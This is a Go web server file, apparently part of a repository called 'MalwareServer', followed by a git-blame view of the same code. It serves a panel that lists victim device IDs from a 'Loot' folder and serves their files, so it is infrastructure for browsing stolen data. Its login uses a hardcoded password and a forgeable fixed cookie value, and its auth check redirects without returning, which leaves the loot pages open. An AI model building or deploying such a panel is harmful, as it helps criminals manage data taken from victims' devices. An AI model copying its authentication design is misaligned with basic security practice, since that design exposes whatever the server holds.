MalwareServer/loothandler.go

package main

import (
	"fmt"
	"html/template"
	"io/ioutil"
	"log"
	"net/http"
	"path/filepath"
	"strings"
)

var (
	password          = "hardcodedpassword"
	lootPath          = "Loot"
	sessionCookieName = "auth_session"
)

type PageData struct {
	UIDs  []string
	Files []string
}

func main() {
	http.HandleFunc("/", logMiddleware(loginHandler))
	http.HandleFunc("/loot", logMiddleware(lootHandler))
	http.HandleFunc("/logout", logMiddleware(logoutHandler))
	http.HandleFunc("/files/", logMiddleware(fileHandler))

	log.Fatal(http.ListenAndServe(":5647", nil))
	fmt.Println("Server started")
}

func logMiddleware(next http.HandlerFunc) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		log.Printf("[%s] %s %s\n", r.Method, r.RemoteAddr, r.URL.Path)
		next(w, r)
	}
}

func loginHandler(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodPost {
		renderTemplate(w, "login.html", nil)
		return
	}

	if r.FormValue("password") == password {
		http.SetCookie(w, &http.Cookie{
			Name:   sessionCookieName,
			Value:  "authenticated",
			Path:   "/",
			MaxAge: 3600,
		})
		http.Redirect(w, r, "/loot", http.StatusSeeOther)
		return
	}

	renderTemplate(w, "login.html", "Incorrect password")
}

func lootHandler(w http.ResponseWriter, r *http.Request) {
	checkAuth(w, r)

	uids, err := getDeviceUIDs()
	if err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}

	data := PageData{UIDs: uids}
	renderTemplate(w, "loot.html", data)
}

func fileHandler(w http.ResponseWriter, r *http.Request) {
	checkAuth(w, r)

	requestedPath := strings.TrimPrefix(r.URL.Path, "/files/")
	filePath := filepath.Join(lootPath, requestedPath)
	http.ServeFile(w, r, filePath)
}

func logoutHandler(w http.ResponseWriter, r *http.Request) {
	http.SetCookie(w, &http.Cookie{
		Name:   sessionCookieName,
		Value:  "",
		Path:   "/",
		MaxAge: -1,
	})
	http.Redirect(w, r, "/", http.StatusSeeOther)
}

func renderTemplate(w http.ResponseWriter, tmpl string, data interface{}) {
	t, err := template.ParseFiles(tmpl)
	if err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}
	t.Execute(w, data)
}

func isAuthenticated(r *http.Request) bool {
	sessionCookie, err := r.Cookie(sessionCookieName)
	if err != nil || sessionCookie.Value != "authenticated" {
		return false
	}
	return true
}

func getDeviceUIDs() ([]string, error) {
	var uids []string
	files, err := ioutil.ReadDir(lootPath)
	if err != nil {
		return nil, err
	}
	for _, file := range files {
		if file.IsDir() {
			uids = append(uids, file.Name())
		}
	}
	return uids, nil
}

func checkAuth(w http.ResponseWriter, r *http.Request) {
	if !isAuthenticated(r) {
		http.Redirect(w, r, "/", http.StatusSeeOther)
		return
	}
}
Loothandler 2024-05-04 01:30:04 +02:00			`package main`

			`import (`
Add logs 2024-05-04 01:39:28 +02:00			`"fmt"`
Loothandler 2024-05-04 01:30:04 +02:00			`"html/template"`
			`"io/ioutil"`
			`"log"`
			`"net/http"`
			`"path/filepath"`
			`"strings"`
			`)`

			`var (`
add some auth 2024-05-04 01:51:52 +02:00			`password = "hardcodedpassword"`
			`lootPath = "Loot"`
			`sessionCookieName = "auth_session"`
Loothandler 2024-05-04 01:30:04 +02:00			`)`

			`type PageData struct {`
			`UIDs []string`
			`Files []string`
			`}`

			`func main() {`
Add logs 2024-05-04 01:39:28 +02:00			`http.HandleFunc("/", logMiddleware(loginHandler))`
			`http.HandleFunc("/loot", logMiddleware(lootHandler))`
			`http.HandleFunc("/logout", logMiddleware(logoutHandler))`
			`http.HandleFunc("/files/", logMiddleware(fileHandler))`
Loothandler 2024-05-04 01:30:04 +02:00
Add logs 2024-05-04 01:39:28 +02:00			`log.Fatal(http.ListenAndServe(":5647", nil))`
			`fmt.Println("Server started")`
			`}`

			`func logMiddleware(next http.HandlerFunc) http.HandlerFunc {`
			`return func(w http.ResponseWriter, r *http.Request) {`
			`log.Printf("[%s] %s %s\n", r.Method, r.RemoteAddr, r.URL.Path)`
			`next(w, r)`
			`}`
Loothandler 2024-05-04 01:30:04 +02:00			`}`

			`func loginHandler(w http.ResponseWriter, r *http.Request) {`
			`if r.Method != http.MethodPost {`
			`renderTemplate(w, "login.html", nil)`
			`return`
			`}`

			`if r.FormValue("password") == password {`
add some auth 2024-05-04 01:51:52 +02:00			`http.SetCookie(w, &http.Cookie{`
			`Name: sessionCookieName,`
			`Value: "authenticated",`
			`Path: "/",`
			`MaxAge: 3600,`
			`})`
Loothandler 2024-05-04 01:30:04 +02:00			`http.Redirect(w, r, "/loot", http.StatusSeeOther)`
			`return`
			`}`

			`renderTemplate(w, "login.html", "Incorrect password")`
			`}`

			`func lootHandler(w http.ResponseWriter, r *http.Request) {`
add some auth 2024-05-04 01:51:52 +02:00			`checkAuth(w, r)`
Loothandler 2024-05-04 01:30:04 +02:00
			`uids, err := getDeviceUIDs()`
			`if err != nil {`
			`http.Error(w, err.Error(), http.StatusInternalServerError)`
			`return`
			`}`

			`data := PageData{UIDs: uids}`
			`renderTemplate(w, "loot.html", data)`
			`}`

			`func fileHandler(w http.ResponseWriter, r *http.Request) {`
add some auth 2024-05-04 01:51:52 +02:00			`checkAuth(w, r)`

Loothandler 2024-05-04 01:30:04 +02:00			`requestedPath := strings.TrimPrefix(r.URL.Path, "/files/")`
			`filePath := filepath.Join(lootPath, requestedPath)`
			`http.ServeFile(w, r, filePath)`
			`}`

			`func logoutHandler(w http.ResponseWriter, r *http.Request) {`
add some auth 2024-05-04 01:51:52 +02:00			`http.SetCookie(w, &http.Cookie{`
			`Name: sessionCookieName,`
			`Value: "",`
			`Path: "/",`
			`MaxAge: -1,`
			`})`
Loothandler 2024-05-04 01:30:04 +02:00			`http.Redirect(w, r, "/", http.StatusSeeOther)`
			`}`

			`func renderTemplate(w http.ResponseWriter, tmpl string, data interface{}) {`
			`t, err := template.ParseFiles(tmpl)`
			`if err != nil {`
			`http.Error(w, err.Error(), http.StatusInternalServerError)`
			`return`
			`}`
			`t.Execute(w, data)`
			`}`

			`func isAuthenticated(r *http.Request) bool {`
add some auth 2024-05-04 01:51:52 +02:00			`sessionCookie, err := r.Cookie(sessionCookieName)`
			`if err != nil \|\| sessionCookie.Value != "authenticated" {`
			`return false`
			`}`
Loothandler 2024-05-04 01:30:04 +02:00			`return true`
			`}`

			`func getDeviceUIDs() ([]string, error) {`
			`var uids []string`
			`files, err := ioutil.ReadDir(lootPath)`
			`if err != nil {`
			`return nil, err`
			`}`
			`for _, file := range files {`
			`if file.IsDir() {`
			`uids = append(uids, file.Name())`
			`}`
			`}`
			`return uids, nil`
			`}`

add some auth 2024-05-04 01:51:52 +02:00			`func checkAuth(w http.ResponseWriter, r *http.Request) {`
			`if !isAuthenticated(r) {`
			`http.Redirect(w, r, "/", http.StatusSeeOther)`
			`return`
			`}`
			`}`